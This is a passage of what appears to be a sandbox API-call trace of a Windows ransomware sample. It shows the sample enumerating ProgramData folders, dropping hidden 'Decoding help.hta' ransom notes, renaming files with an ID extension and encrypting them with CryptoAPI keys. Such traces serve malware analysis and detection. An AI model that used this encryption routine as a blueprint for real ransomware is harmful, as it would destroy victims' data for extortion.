dwReserved1=0x0, cFileName="jaureglist.xml", cAlternateFileName="JAUREG~1.XML")) returned 1 [0043.221] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*" [0043.221] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*") returned 43 [0043.221] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\Decoding help.hta" [0043.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\programdata\\sun\\java\\java update\\decoding help.hta")) returned 0xffffffff [0043.221] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\programdata\\sun\\java\\java update\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ac [0043.225] WriteFile (in: hFile=0x6ac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3e4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.226] CloseHandle (hObject=0x6ac) returned 1 [0043.226] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.226] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jaureglist.xml") returned -1 [0043.226] lstrlenW (lpString="jaureglist.xml") returned 14 [0043.226] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*" [0043.226] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*.*") returned 43 [0043.226] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\", lpString2="jaureglist.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" [0043.227] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" [0043.227] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0043.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.227] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ac [0043.227] CreateFileMappingA (hFile=0x6ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6a0 [0043.227] CryptAcquireContextA (in: phProv=0x3e4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3e4fcec*=0x3448d80) returned 1 [0043.228] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x3e4fce8 | out: phKey=0x3e4fce8*=0x6719b0) returned 1 [0043.228] CryptExportKey (in: hKey=0x6719b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3e4fbe4, pdwDataLen=0x3e4fce4 | out: pbData=0x3e4fbe4*, pdwDataLen=0x3e4fce4*=0x2c) returned 1 [0043.228] MapViewOfFile (hFileMappingObject=0x6a0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x60) returned 0xde30000 [0043.231] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e4fbe4*, pdwDataLen=0x3e4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3e4fbe4*, pdwDataLen=0x3e4fcf8*=0x100) returned 1 [0043.231] CryptEncrypt (in: hKey=0x6719b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xde30000*, pdwDataLen=0x3e4fce4*=0x60, dwBufLen=0x60 | out: pbData=0xde30000*, pdwDataLen=0x3e4fce4*=0x60) returned 1 [0043.231] UnmapViewOfFile (lpBaseAddress=0xde30000) returned 1 [0043.232] CloseHandle (hObject=0x6a0) returned 1 [0043.232] CryptDestroyKey (hKey=0x6719b0) returned 1 [0043.232] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0043.232] SetFilePointerEx (in: hFile=0x6ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.233] WriteFile (in: hFile=0x6ac, lpBuffer=0x3e4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x3e4fbe4*, lpNumberOfBytesWritten=0x3e4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.233] WriteFile (in: hFile=0x6ac, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3e4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.233] CloseHandle (hObject=0x6ac) returned 1 [0043.234] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.235] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x77, dwReserved0=0x0, dwReserved1=0x0, cFileName="jaureglist.xml", cAlternateFileName="JAUREG~1.XML")) returned 0 [0043.235] FindClose (in: hFindFile=0x5d8b90 | out: hFindFile=0x5d8b90) returned 1 Thread: id = 363 os_tid = 0xa34 [0043.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*", lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0043.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.223] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.223] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.223] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outbound", cAlternateFileName="")) returned 1 [0043.224] lstrcmpW (lpString1=".", lpString2="Outbound") returned -1 [0043.224] lstrcmpW (lpString1="..", lpString2="Outbound") returned -1 [0043.224] lstrcmpiW (lpString1="windows", lpString2="Outbound") returned 1 [0043.224] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" [0043.224] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned 36 [0043.224] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\", lpString2="Outbound" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound" [0043.224] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*.*" [0043.224] GlobalMemoryStatus (in: lpBuffer=0x7b4fd10 | out: lpBuffer=0x7b4fd10) [0043.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107c0118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.240] CloseHandle (hObject=0x708) returned 1 [0043.240] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0043.240] lstrcmpW (lpString1=".", lpString2="PublishedData") returned -1 [0043.240] lstrcmpW (lpString1="..", lpString2="PublishedData") returned -1 [0043.240] lstrcmpiW (lpString1="windows", lpString2="PublishedData") returned 1 [0043.240] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" [0043.240] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned 36 [0043.240] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\", lpString2="PublishedData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData" [0043.240] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*" [0043.240] GlobalMemoryStatus (in: lpBuffer=0x7b4fd10 | out: lpBuffer=0x7b4fd10) [0043.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107a80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.276] CloseHandle (hObject=0x708) returned 1 [0043.276] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0043.276] lstrcmpW (lpString1=".", lpString2="StateData") returned -1 [0043.276] lstrcmpW (lpString1="..", lpString2="StateData") returned -1 [0043.276] lstrcmpiW (lpString1="windows", lpString2="StateData") returned 1 [0043.276] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" [0043.276] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned 36 [0043.276] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\", lpString2="StateData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData" [0043.276] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*" [0043.276] GlobalMemoryStatus (in: lpBuffer=0x7b4fd10 | out: lpBuffer=0x7b4fd10) [0043.276] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d86c20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.281] CloseHandle (hObject=0x708) returned 1 [0043.282] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0043.282] lstrcmpW (lpString1=".", lpString2="Temp") returned -1 [0043.282] lstrcmpW (lpString1="..", lpString2="Temp") returned -1 [0043.282] lstrcmpiW (lpString1="windows", lpString2="Temp") returned 1 [0043.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" [0043.282] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned 36 [0043.282] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\", lpString2="Temp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp" [0043.282] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" [0043.282] GlobalMemoryStatus (in: lpBuffer=0x7b4fd10 | out: lpBuffer=0x7b4fd10) [0043.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a02e60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.284] CloseHandle (hObject=0x708) returned 1 [0043.284] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0043.284] FindClose (in: hFindFile=0x671a30 | out: hFindFile=0x671a30) returned 1 Thread: id = 364 os_tid = 0x994 [0043.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*.*", lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0043.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.275] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.275] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.275] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0043.275] lstrcmpW (lpString1=".", lpString2="Data") returned -1 [0043.275] lstrcmpW (lpString1="..", lpString2="Data") returned -1 [0043.275] lstrcmpiW (lpString1="windows", lpString2="Data") returned 1 [0043.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*.*" [0043.275] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*.*") returned 39 [0043.275] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\", lpString2="Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data" [0043.275] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*" [0043.275] GlobalMemoryStatus (in: lpBuffer=0xf24fd10 | out: lpBuffer=0xf24fd10) [0043.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x998ac58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.281] CloseHandle (hObject=0x6a0) returned 1 [0043.281] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 0 [0043.281] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 365 os_tid = 0xbe8 [0043.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*", lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0043.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.246] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.246] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.246] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29423840, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz.dat", cAlternateFileName="5P5NRG~1.DAT")) returned 1 [0043.246] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" [0043.246] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned 54 [0043.246] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta" [0043.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\decoding help.hta")) returned 0xffffffff [0043.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0043.247] WriteFile (in: hFile=0x6a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xf74fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xf74fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.248] CloseHandle (hObject=0x6a0) returned 1 [0043.248] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.248] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0043.248] lstrcmpW (lpString1=".", lpString2="Default Pictures") returned -1 [0043.249] lstrcmpW (lpString1="..", lpString2="Default Pictures") returned -1 [0043.249] lstrcmpiW (lpString1="windows", lpString2="Default Pictures") returned 1 [0043.249] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" [0043.249] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned 54 [0043.249] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\", lpString2="Default Pictures" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures" [0043.249] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account 